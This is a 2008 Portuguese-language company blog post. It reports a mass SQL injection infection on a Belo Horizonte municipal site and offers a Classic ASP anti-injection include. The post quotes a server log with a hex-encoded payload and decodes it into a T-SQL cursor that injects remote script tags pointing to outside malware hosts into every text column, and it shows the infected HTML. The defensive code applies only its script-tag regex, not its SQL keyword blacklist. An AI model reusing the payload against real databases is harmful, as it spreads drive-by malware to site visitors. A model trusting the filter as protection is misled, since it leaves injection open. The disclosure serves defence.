Postado por: Raphael Cangucu
Hoje eu estava navegando nas páginas da PBH procurando um sistema web para reemissão de alvará de funcionamento para anos anteriores , pois desde que assumimos a Codificar (antiga Tecnocom) em 2007 nunca nos notificaram que existia uma pendência na Taxa de Incêndio de 2004. Pendência aliás que está com um valor incorreto, pois as dimensões da empresa estão completamente erradas, quase 10x maior que a verdadeira.
Enfim vamos ao que interessa. Um erro muito comum e cometido por desenvolvedores menos experientes, ou ainda desorganizados é a permissividade de inserção de código malicioso via métodos get e post do protocolo HTTP. Ambos os métodos permitem que uma página web troque informações com um servidor web através de variáveis textuais de maneira muito simples e fácil. Contudo fica como obrigação do desenvolvedor tratar o recebimento dessas variáveis que muitas vezes podem conter código malicioso.
Em linguagens de programação mais modernas e melhores encapsuladas, ou ainda em frameworks que modernizam e melhoram certas LP’s há tratamento destes inputs, coibindo assim o ataque ao site.
O erro que vi no site da PBH já aconteceu alguns de nossos clientes que possuem sites/sistemas desenvolvidos em Linguagem de Programação ASP. Diga-se de passagem que não fomos nós da Codificar que desenvolvemos os sites/sistemas de nossos clientes, somente assumimos a manutenção quando o CIRCO já estava pegando fogo.
Geralmente o erro é explorado da seguinte forma:
- Site vulnerável em ASP
- Componentes de MDAC desatualizados no servidor windows
- Código malicioso inserido por SQL INJECTION utilizando valores hexadecimais que traduzidos correspodem a declaração de um cursor que vai em todos os campos textuais do banco de dados SQL Server e concatenam o código indevido.
Tal erro, além de ser uma falha de programação é também um erro em alguns componentes windows (item 2 acima) que não me lembro bem, mas na época em que ocorreu isso em 2 de nossos clientes que estavam hospedados na locaweb, indicamos a atualização dos mesmos ao suporte da locaweb.
Veja como o ataque é realizado através do log do servidor web onde um cliente da Codificar recebeu esse ataque:
2008-05-27 03:02:11 W3SVC13927 PLESKWIN12 200.23X.XXX.XXX GET /page.asp intIndex=85;DECLARE%20@S%
20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E61647739352E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));
EX3C(@S);– 80 – 77.237.76.98 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) – - www.CLIENTE-CODIFICAR.com.br 200 0 64 0 1413 49151
Segundo o MAXMIND.com site que possui serviços de georeferenciamento de IP’s, o IP 77.237.76.98 está localizado no IRAN:
| Hostname | Country Code | Country Name | Region | Region Name | City | Postal Code | Latitude | Longitude | ISP | Organization | Metro Code | Area Code |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 77.237.76.98 | IR | Iran, Islamic Republic of | 05 | Kohkiluyeh va Buyer Ahmadi | Gachsaran | 30.3586 | 50.7981 | Respina Networks & Beyond | Respina Networks & Beyond |
Pegando esse trecho em HEXA e transformado para ASCII temos:
DECLARE @T VARCHAR(255)"@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name"b.name FROM sysobjects a"syscolumns b WHERE a.id=b.id AND a.xtype="u" AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T"@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC("UPDATE ["+@T+"] SET ["+@C+"]=RTRIM(CONVERT( VARCHAR(4000)"["+@C+"]))+""<scrip_t src=http://www_adw_95_com/_b.js></fechascript>""") FETCH NEXT FROM Table_Cursor INTO @T"@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Em tempo de execução da página web esse código é executado alterando todos textos do banco de dados.
Veja como ficou a página afetada da PBH. (http://www.fazenda.pbh.gov.br/internet/pesquisas/consultas/resultado.asp?BuscaPalavra=alvar%E1&TipoBusca=A)
<table width="100%"> <tbody> <tr> <td colspan="2" width="100%" height="22" align="left" valign="top"> <hr size="1" noshade="noshade" /> </td> </tr> <tr> <td width="15%" height="22" align="left" valign="top"><span style="color: #000000; font-family: Arial; font-size: x-small;"><strong>013/2002<script src="http://www.chinabnr.com/b.js"></script><script src="http://www.bnradw.com/b.js"></script> </strong></span><strong> </strong></td> <td width="80%" height="22" align="left" valign="top"><span style="color: #000000; font-family: Arial; font-size: x-small;">"ISSQN - PROFISSIONAIS AUTÔNOMOS - OBRIGAÇÕES TRIBUTÁRIAS.Os profissionais autônomos, salvo os isentos do ISSQN, que exercerem suas atividades no território do Município, devem inscrever-se no cadastro mobiliário de contribuintes, recolher o ISSQN devido e comunicar as alterações cadastrais de interesse do fisco, inclusive o encerramento das atividades. Podem sujeitar-se ainda à incidência da Taxa de Fiscalização de Anúncios, se proprietário de engenho de divulgação de publicidade, e da Taxa de Fiscalização Sanitária, caso exerçam atividades que devam submeter-se à fiscalização específica.<script src="http://www.china_bnr_com/b_js">// <![CDATA[ </fecchascript><script src-"http://www_bnradw_com-b-js"> // ]]></script>"</span></td> <td width="5%" height="22" align="left" valign="top"><span style="color: #000000; font-family: Arial; font-size: x-small;"><a onmouseover="MM_swapImage('Image791','','../../../dividativa/avanca_on.gif',1)" onmouseout="MM_swapImgRestore()" href="resultadoaction.asp?Bookmark=2&BuscaPalavra=alvar%C3%A1&TipoBusca=A"><img src="../../../dividativa/avanca.gif" border="0" alt="" width="16" height="16" /></a></span> </td> </tr> </tbody> </table>
Caso tenha um bom anti-virus e peça para visualizar o código fonte dessa página ou ainda entrar na pasta de cache do seu navegar ele irá acusar a presença do código malicioso.
Anteriormente já tinhamos anunciado a solução aqui em nosso blog:
- Coloque / inclua o script ASP fix_injection nos arquivos que fazem comunicação com o banco de dados, veja o código no post ASP – ANTI SQL INJECTION.
- Caso não houve perda dos dados dos campos textuais, use o script SQL de Busca e substituição postado em SEARCH AND REPLACE T-SQL.
Foi enviado um email para webmaster@pbh.gov.br com o link deste post para correção dos erros.
Caso não consiga solucionar o problema , ou possui problemas parecidos com esse de difícil solução em seu sistema/site entre em contato com a Codificar e peça um orçamento através do nosso formulário de contato.
Atenciosamente,
Raphael Canguçu.
.26/05/2008
ASP – ANTI-SQL INJECTION
Postado por: Raphael Cangucu
Abaixo segue um script para a linguagem ASP – CLASSIC.
Esse arquivo deve ser incluído dentro do arquivo onde é feita a conexão do banco de dados, ou em um include global.
fix_injection.asp
<%
‘ fix_injection.asp
‘
‘ Author: Nazim Lala, Codificar (http://www.codificar.com.br)
‘ Modified Date: 26-05-2008
‘ This is the include file to use with your asp pages to
‘ validate input for SQL injection.
Dim BlackList, ErrorPage
‘
‘ Below is a black list that will block certain SQL commands and
‘ sequences used in SQL injection will help with i\0 putaput sanitization
‘
‘ However this is may not suffice, because:
‘ 1) These might not cover all the cases (like encoded characters)
‘ 2) This may disallow legitimate input
‘
‘ Creating a raw sql query strings by concatenating user input is
‘ unsafe programming practice. It is advised that you use parameterized
‘ SQL instead. Check http://support.microsoft.com/kb/q164485/ for information
‘ on how to do this using ADO from ASP.
‘
‘ Moreover, you need to also implement a white list for your parameters.
‘ For example, if you are expecting input for a zipcode you should create
‘ a validation rule that will only allow 5 characters in [0-9].
‘
BlackList = Array(“–”, “;”, “/*”, “*/”, “@@”, “@”,_
“char”, “nchar”, “varchar”, “nvarchar”,_
“alter”, “begin”, “cast”, “create”, “cursor”,_
“declare”, “delete”, “drop”, “end”, “exec”,_
“execute”, “fetch”, “insert”, “kill”, “open”,_
“select”, “sys”, “sysobjects”, “syscolumns”,_
“table”, “update”)
‘ Populate the error page you want to redirect to in case the
‘ check fails.
ErrorPage = “/fix_injection/error_page.asp”
”””””””””””””””””””””””””’
‘ This function does not check for encoded characters
‘ since we do not know the form of encoding your application
‘ uses. Add the appropriate logic to deal with encoded characters
‘ in here
”””””””””””””””””””””””””’
Function CheckStringForSQL(str)
On Error Resume Next
Dim lstr
‘ If the string is empty, return true
If ( IsEmpty(str) ) Then
CheckStringForSQL = false
Exit Function
ElseIf ( StrComp(str, “”) = 0 ) Then
CheckStringForSQL = false
Exit Function
End If
lstr = LCase(str)
‘ Check if the string contains any patterns in our
‘ black list
For Each s in BlackList
If ( InStr (lstr, s) <> 0 ) Then
CheckStringForSQL = true
Exit Function
End If
Next
CheckStringForSQL = false
End Function
Public Function CheckString (strEntrada)
Dim objRegExp
Set objRegExp = Server.CreateObject(“VBScript.RegExp”)
Dim strExpressao
strExpressao = “(<\s*/*(script|object|applet|embed|form|img)\s*.*>)” ‘< [/] script ou object ou applet ou embed ou form >
strExpressao = strExpressao & “|” & “(\s+eval\s*\()” ‘ EVAL(
strExpressao = strExpressao & “|” & “(\s+event\s*=)” ‘ Event=
strExpressao = Replace(strExpressao, “<”, “(<|%60|<)”) ‘Garantir < ou < em HTML ENCODE
strExpressao = Replace(strExpressao, “>”, “(>|%62|>)”) ‘Garantir > ou > em HTML ENCODE
objRegExp.IgnoreCase = True ‘Ignorar caixa “ALTA” ou “baixa”
objRegExp.Global = False ‘Para na hora que encontrar (velocidade)
objRegExp.Pattern = strExpressao ‘Define a expressão
CheckString = objRegExp.Test(strEntrada) ‘testa
Set objRegExp = Nothing
End Function
”””””””””””””””””””””””””’
‘ Check forms data
”””””””””””””””””””””””””’
Dim s
For Each s in Request.Form
If ( CheckString(Request.Form(s)) ) Then
‘ Redirect to an error page
Response.Redirect(ErrorPage)
End If
Next
”””””””””””””””””””””””””’
‘ Check query string
”””””””””””””””””””””””””’
For Each s in Request.QueryString
If ( CheckString(Request.QueryString(s)) ) Then
‘ Redirect to error page
Response.Redirect(ErrorPage)
End If
Next
”””””””””””””””””””””””””’
‘ Check cookies
”””””””””””””””””””””””””’
For Each s in Request.Cookies
If ( CheckString(Request.Cookies(s)) ) Then
‘ Redirect to error page
Response.Redirect(ErrorPage)
End If
Next
”””””””””””””””””””””””””’
‘ Add additional checks for input that your application
‘ uses. (for example various request headers your app
‘ might use)
”””””””””””””””””””””””””’
%>
error_page.asp
<%@LANGUAGE=”VBSCRIPT” CODEPAGE=”65001″%>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<title>SQL INJECTION</title>
<style type=”text/css”>
<!–
.style1 {color: #FF0000}
–>
</style>
</head>
<body>
<h1 class=”style1″>Tentativa de exploração de falha de segurança!!!</h1>
<p class=”style1″>Verifique os dados inseridos.</p>
</body>
</html>
os Arquivos fix_injection.
